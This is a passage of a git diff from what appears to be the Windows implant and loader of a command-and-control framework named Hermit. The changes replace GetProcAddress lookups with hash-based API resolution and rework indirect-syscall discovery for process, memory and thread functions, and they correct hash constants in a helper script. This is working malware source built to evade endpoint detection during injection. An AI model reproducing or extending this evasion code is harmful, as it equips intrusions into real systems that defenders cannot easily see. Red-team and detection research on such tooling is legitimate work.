pProcs->lpWinHttpSendRequest = reinterpret_cast(GetProcAddress(hWinHTTPDLL, "WinHttpSendRequest")); - pProcs->lpWinHttpWriteData = reinterpret_cast(GetProcAddress(hWinHTTPDLL, "WinHttpWriteData")); - pProcs->lpWinHttpReceiveResponse = reinterpret_cast(GetProcAddress(hWinHTTPDLL, "WinHttpReceiveResponse")); - pProcs->lpWinHttpQueryHeaders = reinterpret_cast(GetProcAddress(hWinHTTPDLL, "WinHttpQueryHeaders")); - pProcs->lpWinHttpQueryDataAvailable = reinterpret_cast(GetProcAddress(hWinHTTPDLL, "WinHttpQueryDataAvailable")); - pProcs->lpWinHttpReadData = reinterpret_cast(GetProcAddress(hWinHTTPDLL, "WinHttpReadData")); - pProcs->lpWinHttpCloseHandle = reinterpret_cast(GetProcAddress(hWinHTTPDLL, "WinHttpCloseHandle")); + PVOID pSetFileInformationByHandle = GetProcAddressByHash(hKernel32DLL, APIHASH_SETFILEINFORMATIONBYHANDLE); + pProcs->lpSetFileInformationByHandle = reinterpret_cast(pSetFileInformationByHandle); + PVOID pWinHttpOpen = GetProcAddressByHash(hWinHTTPDLL, APIHASH_WINHTTPOPEN); + pProcs->lpWinHttpOpen = reinterpret_cast(pWinHttpOpen); + PVOID pWinHttpConnect = GetProcAddressByHash(hWinHTTPDLL, APIHASH_WINHTTPCONNECT); + pProcs->lpWinHttpConnect = reinterpret_cast(pWinHttpConnect); + PVOID pWinHttpOpenRequest = GetProcAddressByHash(hWinHTTPDLL, APIHASH_WINHTTPOPENREQUEST); + pProcs->lpWinHttpOpenRequest = reinterpret_cast(pWinHttpOpenRequest); + PVOID pWinHttpSetOption = GetProcAddressByHash(hWinHTTPDLL, APIHASH_WINHTTPSETOPTION); + pProcs->lpWinHttpSetOption = reinterpret_cast(pWinHttpSetOption); + PVOID pWinHttpSendRequest = GetProcAddressByHash(hWinHTTPDLL, APIHASH_WINHTTPSENDREQUEST); + pProcs->lpWinHttpSendRequest = reinterpret_cast(pWinHttpSendRequest); + PVOID pWinHttpWriteData = GetProcAddressByHash(hWinHTTPDLL, APIHASH_WINHTTPWRITEDATA); + pProcs->lpWinHttpWriteData = reinterpret_cast(pWinHttpWriteData); + PVOID pWinHttpReceiveResponse = GetProcAddressByHash(hWinHTTPDLL, APIHASH_WINHTTPRECEIVERESPONSE); + pProcs->lpWinHttpReceiveResponse = reinterpret_cast(pWinHttpReceiveResponse); + PVOID pWinHttpQueryHeaders = GetProcAddressByHash(hWinHTTPDLL, APIHASH_WINHTTPQUERYHEADERS); + pProcs->lpWinHttpQueryHeaders = reinterpret_cast(pWinHttpQueryHeaders); + PVOID pWinHttpQueryDataAvailable = GetProcAddressByHash(hWinHTTPDLL, APIHASH_WINHTTPQUERYDATAAVAILABLE); + pProcs->lpWinHttpQueryDataAvailable = reinterpret_cast(pWinHttpQueryDataAvailable); + PVOID pWinHttpReadData = GetProcAddressByHash(hWinHTTPDLL, APIHASH_WINHTTPREADDATA); + pProcs->lpWinHttpReadData = reinterpret_cast(pWinHttpReadData); + PVOID pWinHttpCloseHandle = GetProcAddressByHash(hWinHTTPDLL, APIHASH_WINHTTPCLOSEHANDLE); + pProcs->lpWinHttpCloseHandle = reinterpret_cast(pWinHttpCloseHandle); if (bIndirectSyscalls) { - pProcs->sysNtCreateProcessEx = Syscalls::FindSyscall(hNTDLL, "NtCreateProcessEx"); - pProcs->sysNtOpenProcess = Syscalls::FindSyscall(hNTDLL, "NtOpenProcess"); - pProcs->sysNtOpenProcessToken = Syscalls::FindSyscall(hNTDLL, "NtOpenProcessToken"); - pProcs->sysNtTerminateProcess = Syscalls::FindSyscall(hNTDLL, "NtTerminateProcess"); - pProcs->sysNtCreateThreadEx = Syscalls::FindSyscall(hNTDLL, "NtCreateThreadEx"); - pProcs->sysNtResumeThread = Syscalls::FindSyscall(hNTDLL, "NtResumeThread"); - pProcs->sysNtGetContextThread = Syscalls::FindSyscall(hNTDLL, "NtGetContextThread"); - pProcs->sysNtSetContextThread = Syscalls::FindSyscall(hNTDLL, "NtSetContextThread"); - pProcs->sysNtAllocateVirtualMemory = Syscalls::FindSyscall(hNTDLL, "NtAllocateVirtualMemory"); - pProcs->sysNtProtectVirtualMemory = Syscalls::FindSyscall(hNTDLL, "NtProtectVirtualMemory"); - pProcs->sysNtReadVirtualMemory = Syscalls::FindSyscall(hNTDLL, "NtReadVirtualMemory"); - pProcs->sysNtWriteVirtualMemory = Syscalls::FindSyscall(hNTDLL, "NtWriteVirtualMemory"); - pProcs->sysNtFreeVirtualMemory = Syscalls::FindSyscall(hNTDLL, "NtFreeVirtualMemory"); - pProcs->sysNtDuplicateObject = Syscalls::FindSyscall(hNTDLL, "NtDuplicateObject"); - pProcs->sysNtWaitForSingleObject = Syscalls::FindSyscall(hNTDLL, "NtWaitForSingleObject"); - pProcs->sysNtClose = Syscalls::FindSyscall(hNTDLL, "NtClose"); - pProcs->sysNtCreateFile = Syscalls::FindSyscall(hNTDLL, "NtCreateFile"); - pProcs->sysNtOpenFile = Syscalls::FindSyscall(hNTDLL, "NtOpenFile"); - pProcs->sysNtReadFile = Syscalls::FindSyscall(hNTDLL, "NtReadFile"); - pProcs->sysNtWriteFile = Syscalls::FindSyscall(hNTDLL, "NtWriteFile"); - pProcs->sysNtDeleteFile = Syscalls::FindSyscall(hNTDLL, "NtDeleteFile"); - pProcs->sysNtCreateNamedPipeFile = Syscalls::FindSyscall(hNTDLL, "NtCreateNamedPipeFile"); - pProcs->sysNtQueryInformationProcess = Syscalls::FindSyscall(hNTDLL, "NtQueryInformationProcess"); - pProcs->sysNtQueryInformationFile = Syscalls::FindSyscall(hNTDLL, "NtQueryInformationFile"); - pProcs->sysNtSetInformationFile = Syscalls::FindSyscall(hNTDLL, "NtSetInformationFile"); - pProcs->sysNtQueryInformationToken = Syscalls::FindSyscall(hNTDLL, "NtQueryInformationToken"); - pProcs->sysNtQuerySystemInformation = Syscalls::FindSyscall(hNTDLL, "NtQuerySystemInformation"); - pProcs->sysNtSystemDebugControl = Syscalls::FindSyscall(hNTDLL, "NtSystemDebugControl"); - pProcs->sysNtPrivilegeCheck = Syscalls::FindSyscall(hNTDLL, "NtPrivilegeCheck"); - pProcs->sysNtAdjustPrivilegesToken = Syscalls::FindSyscall(hNTDLL, "NtAdjustPrivilegesToken"); - pProcs->sysNtOpenKeyEx = Syscalls::FindSyscall(hNTDLL, "NtOpenKeyEx"); - pProcs->sysNtQueryKey = Syscalls::FindSyscall(hNTDLL, "NtQueryKey"); - pProcs->sysNtEnumerateValueKey = Syscalls::FindSyscall(hNTDLL, "NtEnumerateValueKey"); - pProcs->sysNtUnmapViewOfSection = Syscalls::FindSyscall(hNTDLL, "NtUnmapViewOfSection"); - - pProcs->sysRtlAllocateHeap = Syscalls::FindSyscall(hNTDLL, "RtlAllocateHeap"); - pProcs->sysRtlInitUnicodeString = Syscalls::FindSyscall(hNTDLL, "RtlInitUnicodeString"); - pProcs->sysRtlStringCchCatW = Syscalls::FindSyscall(hNTDLL, "RtlStringCchCatW"); - pProcs->sysRtlStringCchCopyW = Syscalls::FindSyscall(hNTDLL, "RtlStringCchCopyW"); - pProcs->sysRtlStringCchLengthW = Syscalls::FindSyscall(hNTDLL, "RtlStringCchLengthW"); - pProcs->sysRtlGetCurrentDirectory_U = Syscalls::FindSyscall(hNTDLL, "RtlGetCurrentDirectory_U"); - pProcs->sysRtlSetCurrentDirectory_U = Syscalls::FindSyscall(hNTDLL, "RtlSetCurrentDirectory_U"); - pProcs->sysRtlGetFullPathName_U = Syscalls::FindSyscall(hNTDLL, "RtlGetFullPathName_U"); + pProcs->sysNtCreateProcessEx = Syscalls::FindSyscall(reinterpret_cast(pNtCreateProcessEx)); + pProcs->sysNtOpenProcess = Syscalls::FindSyscall(reinterpret_cast(pNtOpenProcess)); + pProcs->sysNtOpenProcessToken = Syscalls::FindSyscall(reinterpret_cast(pNtOpenProcessToken)); + pProcs->sysNtTerminateProcess = Syscalls::FindSyscall(reinterpret_cast(pNtTerminateProcess)); + pProcs->sysNtCreateThreadEx = Syscalls::FindSyscall(reinterpret_cast(pNtCreateThreadEx)); + pProcs->sysNtResumeThread = Syscalls::FindSyscall(reinterpret_cast(pNtResumeThread)); + pProcs->sysNtGetContextThread = Syscalls::FindSyscall(reinterpret_cast(pNtGetContextThread)); + pProcs->sysNtSetContextThread = Syscalls::FindSyscall(reinterpret_cast(pNtSetContextThread)); + pProcs->sysNtAllocateVirtualMemory = Syscalls::FindSyscall(reinterpret_cast(pNtAllocateVirtualMemory)); + pProcs->sysNtProtectVirtualMemory = Syscalls::FindSyscall(reinterpret_cast(pNtProtectVirtualMemory)); + pProcs->sysNtReadVirtualMemory = Syscalls::FindSyscall(reinterpret_cast(pNtReadVirtualMemory)); + pProcs->sysNtWriteVirtualMemory = Syscalls::FindSyscall(reinterpret_cast(pNtWriteVirtualMemory)); + pProcs->sysNtFreeVirtualMemory = Syscalls::FindSyscall(reinterpret_cast(pNtFreeVirtualMemory)); + pProcs->sysNtDuplicateObject = Syscalls::FindSyscall(reinterpret_cast(pNtDuplicateObject)); + pProcs->sysNtWaitForSingleObject = Syscalls::FindSyscall(reinterpret_cast(pNtWaitForSingleObject)); + pProcs->sysNtClose = Syscalls::FindSyscall(reinterpret_cast(pNtClose)); + pProcs->sysNtCreateFile = Syscalls::FindSyscall(reinterpret_cast(pNtCreateFile)); + pProcs->sysNtOpenFile = Syscalls::FindSyscall(reinterpret_cast(pNtOpenFile)); + pProcs->sysNtReadFile = Syscalls::FindSyscall(reinterpret_cast(pNtReadFile)); + pProcs->sysNtWriteFile = Syscalls::FindSyscall(reinterpret_cast(pNtWriteFile)); + pProcs->sysNtDeleteFile = Syscalls::FindSyscall(reinterpret_cast(pNtDeleteFile)); + pProcs->sysNtCreateNamedPipeFile = Syscalls::FindSyscall(reinterpret_cast(pNtCreateNamedPipeFile)); + pProcs->sysNtQueryInformationProcess = Syscalls::FindSyscall(reinterpret_cast(pNtQueryInformationProcess)); + pProcs->sysNtQueryInformationFile = Syscalls::FindSyscall(reinterpret_cast(pNtQueryInformationFile)); + pProcs->sysNtSetInformationFile = Syscalls::FindSyscall(reinterpret_cast(pNtSetInformationFile)); + pProcs->sysNtQueryInformationToken = Syscalls::FindSyscall(reinterpret_cast(pNtQueryInformationToken)); + pProcs->sysNtQuerySystemInformation = Syscalls::FindSyscall(reinterpret_cast(pNtQuerySystemInformation)); + pProcs->sysNtSystemDebugControl = Syscalls::FindSyscall(reinterpret_cast(pNtSystemDebugControl)); + pProcs->sysNtPrivilegeCheck = Syscalls::FindSyscall(reinterpret_cast(pNtPrivilegeCheck)); + pProcs->sysNtAdjustPrivilegesToken = Syscalls::FindSyscall(reinterpret_cast(pNtAdjustPrivilegesToken)); + pProcs->sysNtOpenKeyEx = Syscalls::FindSyscall(reinterpret_cast(pNtOpenKeyEx)); + pProcs->sysNtQueryKey = Syscalls::FindSyscall(reinterpret_cast(pNtQueryKey)); + pProcs->sysNtEnumerateValueKey = Syscalls::FindSyscall(reinterpret_cast(pNtEnumerateValueKey)); + pProcs->sysNtUnmapViewOfSection = Syscalls::FindSyscall(reinterpret_cast(pNtUnmapViewOfSection)); + + pProcs->sysRtlAllocateHeap = Syscalls::FindSyscall(reinterpret_cast(pRtlAllocateHeap)); + pProcs->sysRtlInitUnicodeString = Syscalls::FindSyscall(reinterpret_cast(pRtlInitUnicodeString)); + pProcs->sysRtlGetCurrentDirectory_U = Syscalls::FindSyscall(reinterpret_cast(pRtlGetCurrentDirectory_U)); + pProcs->sysRtlSetCurrentDirectory_U = Syscalls::FindSyscall(reinterpret_cast(pRtlSetCurrentDirectory_U)); + pProcs->sysRtlGetFullPathName_U = Syscalls::FindSyscall(reinterpret_cast(pRtlGetFullPathName_U)); } return pProcs; diff --git a/payload/win/implant/src/core/syscalls.cpp b/payload/win/implant/src/core/syscalls.cpp index e9fadb9..d1ae798 100644 --- a/payload/win/implant/src/core/syscalls.cpp +++ b/payload/win/implant/src/core/syscalls.cpp @@ -4,19 +4,12 @@ namespace Syscalls { // Get a syscall number and address for a given function. // Reference: https://www.crow.rip/crows-nest/mal/dev/inject/syscalls/indirect-syscalls - SYSCALL FindSyscall(HMODULE hNTDLL, LPCSTR lpNtFunc) + SYSCALL FindSyscall(UINT_PTR pNtFuncAddr) { SYSCALL syscall; - UINT_PTR pNtFuncAddr = (UINT_PTR)nullptr; BYTE syscallOpcode[2] = {0x0F, 0x05}; - pNtFuncAddr = (UINT_PTR)GetProcAddress(hNTDLL, lpNtFunc); - if (!pNtFuncAddr) - { - return syscall; - } - syscall.dwSSN = ((PBYTE)(pNtFuncAddr + 4))[0]; syscall.pAddr = pNtFuncAddr + 0x12; diff --git a/payload/win/implant/src/hermit.cpp b/payload/win/implant/src/hermit.cpp index abbdb48..caf10e0 100644 --- a/payload/win/implant/src/hermit.cpp +++ b/payload/win/implant/src/hermit.cpp @@ -94,8 +94,6 @@ namespace Hermit break; } while (1 == 1); - - // Tasks do { diff --git a/payload/win/loader/include/core/procs.hpp b/payload/win/loader/include/core/procs.hpp index 7e40ada..1e7296a 100644 --- a/payload/win/loader/include/core/procs.hpp +++ b/payload/win/loader/include/core/procs.hpp @@ -22,7 +22,7 @@ #define APIHASH_NTRESUMETHREAD 0x8bad8d92 #define APIHASH_NTGETCONTEXTTHREAD 0x904d345e #define APIHASH_NTSETCONTEXTTHREAD 0x25df9cd2 -#define APIHASH_NTALLOCATEVIRTUALMEMORYEX 0x28af7fe7 +#define APIHASH_NTALLOCATEVIRTUALMEMORY 0xf8829394 #define APIHASH_NTREADVIRTUALMEMORY 0x88bc3b5b #define APIHASH_NTWRITEVIRTUALMEMORY 0x7c61e008 #define APIHASH_NTPROTECTVIRTUALMEMORY 0xa7df2bd8 @@ -40,7 +40,7 @@ #define APIHASH_RTLALLOCATEHEAP 0xcc7755e #define APIHASH_RTLZEROMEMORY 0x899c0d1e #define APIHASH_RTLINITUNICODESTRING 0x4dc9caa9 -#define APIHASH_RTLSTRINGCATW 0x333f6b47 +#define APIHASH_RTLSTRINGCCHCATW 0x2deef223 #define APIHASH_RTLSTRINGCCHCOPYW 0x32231e60 #define APIHASH_RTLSTRINGCCHLENGTHW 0x28821d8f #define APIHASH_RTLQUERYSYSTEMINFORMATION 0xf6044a6a @@ -106,7 +106,7 @@ namespace Procs typedef NTSTATUS (NTAPI* LPPROC_NTGETCONTEXTTHREAD)(HANDLE ThreadHandle, PCONTEXT ThreadContext); // NtSetContextThread typedef NTSTATUS (NTAPI* LPPROC_NTSETCONTEXTTHREAD)(HANDLE ThreadHandle, PCONTEXT ThreadContext); - // NtAllocateVirtualMemoryEx + // NtAllocateVirtualMemory typedef NTSTATUS (NTAPI* LPPROC_NTALLOCATEVIRTUALMEMORY)(HANDLE ProcessHandle, PVOID* BaseAddress, ULONG ZeroBits, PSIZE_T RegionSize, ULONG AllocationType, ULONG Protect); // NtReadVirtualMemory typedef NTSTATUS (NTAPI* LPPROC_NTREADVIRTUALMEMORY)(HANDLE ProcessHandle, PVOID BaseAddress, PVOID Buffer, SIZE_T BufferSize, PSIZE_T NumberOfBytesRead); @@ -144,7 +144,7 @@ namespace Procs typedef VOID (NTAPI* LPPROC_RTLZEROMEMORY)(PVOID Destination, SIZE_T Length); // RtlInitUnicodeString typedef NTSTATUS (NTAPI* LPPROC_RTLINITUNICODESTRING)(PUNICODE_STRING DestinationString, PCWSTR SourceString); - // RtlStringCatW + // RtlStringCchCatW typedef NTSTATUS (NTAPI* LPPROC_RTLSTRINGCCHCATW)(LPWSTR pszDest, SIZE_T cchDest, LPCWSTR pszSrc); // RtlStringCchCopyW typedef NTSTATUS (NTAPI* LPPROC_RTLSTRINGCCHCOPYW)(LPWSTR pszDest, SIZE_T cchDest, LPCWSTR pszSrc); diff --git a/payload/win/loader/script/calc_api_hash.py b/payload/win/loader/script/calc_api_hash.py index fe98a10..523c30b 100644 --- a/payload/win/loader/script/calc_api_hash.py +++ b/payload/win/loader/script/calc_api_hash.py @@ -13,7 +13,7 @@ "NtResumeThread", "NtGetContextThread", "NtSetContextThread", - "NtAllocateVirtualMemoryEx", + "NtAllocateVirtualMemory", "NtReadVirtualMemory", "NtWriteVirtualMemory", "NtProtectVirtualMemory", @@ -32,7 +32,7 @@ "RtlAllocateHeap", "RtlZeroMemory", "RtlInitUnicodeString", - "RtlStringCatW", + "RtlStringCchCatW", "RtlStringCchCopyW", "RtlStringCchLengthW", "RtlQuerySystemInformation", diff --git a/payload/win/loader/src/core/procs.cpp b/payload/win/loader/src/core/procs.cpp index 1e945e4..e476164 100644 --- a/payload/win/loader/src/core/procs.cpp +++ b/payload/win/loader/src/core/procs.cpp @@ -82,7 +82,7 @@ namespace Procs pProcs->lpNtGetContextThread = reinterpret_cast(pNtGetContextThread); PVOID pNtSetContextThread = GetProcAddressByHash(hNTDLL, APIHASH_NTSETCONTEXTTHREAD); pProcs->lpNtSetContextThread = reinterpret_cast(pNtSetContextThread); - PVOID pNtAllocateVirtualMemory = GetProcAddressByHash(hNTDLL, APIHASH_NTALLOCATEVIRTUALMEMORYEX); + PVOID pNtAllocateVirtualMemory = GetProcAddressByHash(hNTDLL, APIHASH_NTALLOCATEVIRTUALMEMORY); pProcs->lpNtAllocateVirtualMemory = reinterpret_cast(pNtAllocateVirtualMemory); PVOID pNtReadVirtualMemory = GetProcAddressByHash(hNTDLL, APIHASH_NTREADVIRTUALMEMORY); pProcs->lpNtReadVirtualMemory = reinterpret_cast(pNtReadVirtualMemory); @@ -114,7 +114,7 @@ namespace Procs pProcs->lpRtlZeroMemory = reinterpret_cast(pRtlZeroMemory); PVOID pRtlInitUnicodeString = GetProcAddressByHash(hNTDLL, APIHASH_RTLINITUNICODESTRING); pProcs->lpRtlInitUnicodeString = reinterpret_cast(pRtlInitUnicodeString); - PVOID pRtlStringCchCatW = GetProcAddressByHash(hNTDLL, APIHASH_RTLSTRINGCATW); + PVOID pRtlStringCchCatW = GetProcAddressByHash(hNTDLL, APIHASH_RTLSTRINGCCHCATW); pProcs->lpRtlStringCchCatW = reinterpret_cast(pRtlStringCchCatW); PVOID pRtlStringCchCopyW = GetProcAddressByHash(hNTDLL, APIHASH_RTLSTRINGCCHCOPYW); pProcs->lpRtlStringCchCopyW = reinterpret_cast(pRtlStringCchCopyW);